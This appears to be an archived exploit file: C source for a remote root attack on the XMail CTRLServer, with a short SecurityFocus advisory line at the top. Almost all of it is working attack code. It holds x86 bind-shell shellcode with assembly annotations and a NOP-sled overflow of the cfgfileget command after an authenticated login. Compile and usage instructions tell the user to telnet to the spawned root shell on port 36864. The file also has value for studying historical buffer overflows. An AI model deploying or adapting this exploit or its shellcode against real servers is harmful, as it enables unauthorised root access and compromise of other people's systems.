// source: https://www.securityfocus.com/bid/2360/info
Versions of CTRLServer are vulnerable to malicious user-supplied input. A failure to properly bounds-check data passed to the cfgfileget() command leads to an overflow, which, properly exploited, can result in remote execution of malicious code with root privilege.
/*
* XMail CTRLServer remote root exploit for linux/x86
*
* Author: isno(isno@etang.com), 01/2001
*
* NOTE:
* Because the buffer is too small to set many of NOP before shellcode,it
* is deficult to guess ret.And it cannot brute force offset,because once
* sending overflow code to the CTRLServer, XMail will be crashed.
*
*
* Tested on:
* RedHat Linux 6.0 i386 XMail 0.65
*
* Compile:
* gcc -o xmailx xmailx.c
*
* Usage:
* ./xmailx username passwd targethost [offset]
* and telnet targethost 36864
*
*/
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#define BSIZE 512
#define RETADDRESS 0xbc7fe988 /* maybe 0xbffff9a4 in some box */
#define OFFSET 20
#define NOP 0x90
#define PORT 6017
void usage(char *app);
/* shellcode bind TCP port 36864 */
char shellcode[]=
/* main: */
"\xeb\x72" /* jmp callz */
/* start: */
"\x5e" /* popl %esi */
/* socket() */
"\x29\xc0" /* subl %eax, %eax */
"\x89\x46\x10" /* movl %eax, 0x10(%esi) */
"\x40" /* incl %eax */
"\x89\xc3" /* movl %eax, %ebx */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\x40" /* incl %eax */
"\x89\x46\x08" /* movl %eax, 0x08(%esi) */
"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */
"\xb0\x66" /* movb $0x66, %al */
"\xcd\x80" /* int $0x80 */
/* bind() */
"\x43" /* incl %ebx */
"\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */
"\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */
"\x88\x46\x08" /* movb %al, 0x08(%esi) */
"\x29\xc0" /* subl %eax, %eax */
"\x89\xc2" /* movl %eax, %edx */
"\x89\x46\x18" /* movl %eax, 0x18(%esi) */
"\xb0\x90" /* movb $0x90, %al */
"\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */
"\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */
"\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */
"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */
"\xb0\x66" /* movb $0x66, %al */
"\xcd\x80" /* int $0x80 */
/* listen() */
"\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */
"\x43" /* incl %ebx */
"\x43" /* incl %ebx */
"\xb0\x66" /* movb $0x66, %al */
"\xcd\x80" /* int $0x80 */
/* accept() */
"\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */
"\x89\x56\x10" /* movl %edx, 0x10(%esi) */
"\xb0\x66" /* movb $0x66, %al */
"\x43" /* incl %ebx */
"\xcd\x80" /* int $0x80 */
/* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
"\x86\xc3" /* xchgb %al, %bl */
"\xb0\x3f" /* movb $0x3f, %al */
"\x29\xc9" /* subl %ecx, %ecx */
"\xcd\x80" /* int $0x80 */
"\xb0\x3f" /* movb $0x3f, %al */
"\x41" /* incl %ecx */
"\xcd\x80" /* int $0x80 */
"\xb0\x3f" /* movb $0x3f, %al */
"\x41" /* incl %ecx */
"\xcd\x80" /* int $0x80 */
/* execve() */
"\x88\x56\x07" /* movb %dl, 0x07(%esi) */
"\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */
"\xb0\x0b" /* movb $0x0b, %al */
"\xcd\x80" /* int $0x80 */
/* callz: */
"\xe8\x89\xff\xff\xff" /* call start */
"/bin/sh";
/* 128 bytes */
int main(int argc, char *argv[])
{
char buff[BSIZE+1];
char sendbuf[600]="cfgfileget\t";
char loginbuf[200];
char rcvbuf[1024];
char *username;
char *password;
char *target;
int i;
int noprange;
int offset=OFFSET;
u_long sp=RETADDRESS;
u_long addr;
int skt;
long inet;
struct hostent *host;
struct sockaddr_in sin;
if(argc<4)
{
usage(argv[0]);
return 1;
}
username = argv[1];
password = argv[2];
target = argv[3];
if(argc>4)
{
offset = atoi(argv[4]);
}
addr=sp - (long)offset;
noprange=256+4-strlen(shellcode);
memset(buff, NOP, BSIZE);
memcpy(buff+(long)noprange, shellcode, strlen(shellcode));
for (i = 256+4; i < BSIZE; i += 4)
*((int *) &buff[i]) = addr;
buff[BSIZE]='\0';
fprintf(stderr, "\nUse retAddress: 0x%08x\n\n",addr);
strcat(sendbuf, buff);
strcat(sendbuf, "\r\n");
strcpy(loginbuf,username);
strcat(loginbuf,"\t"); /* command should splitted by TAB */
strcat(loginbuf,password);
strcat(loginbuf,"\r\n");
skt = socket(PF_INET, SOCK_STREAM, 0);
if(skt == 0)
{
perror("socket()");
exit(-1);
}
inet = inet_addr(target);
if(inet == -1)
{
if(host = gethostbyname(target))
memcpy(&inet, host->h_addr, 4);
else
inet = -1;
if(inet == -1)
{
fprintf(stderr, "Cant resolv %s!!\n", target);
exit (-1);
}
}
sin.sin_family = PF_INET;
sin.sin_port = htons(PORT);
sin.sin_addr.s_addr = inet;
if (connect (skt, (struct sockaddr *)&sin, sizeof(sin)) < 0)
{
perror("Connect()");
exit(-1);
}
read(skt, rcvbuf, 1024);
fprintf(stderr, "%s\n", rcvbuf);
memset(rcvbuf, 0x0, 1024);
fprintf(stderr, "Starting to login...\n");
write(skt, loginbuf, strlen(loginbuf));
sleep(1);
read(skt, rcvbuf, 1024);
if(strstr(rcvbuf,"00000")==NULL)
{
perror("Login failed!");
exit(-1);
}
write(skt, sendbuf, strlen(sendbuf));
close(skt);
fprintf(stderr, "Success!now telnet %s 36864\n", target);
return 1;
}
void usage(char *app)
{
fprintf(stderr, "\nXMail 0.65/0.66 CTRLSvr exploit\n\n");
fprintf(stderr, "Usage: %s username passwd targethost [offset]\n\n", app);
return;
}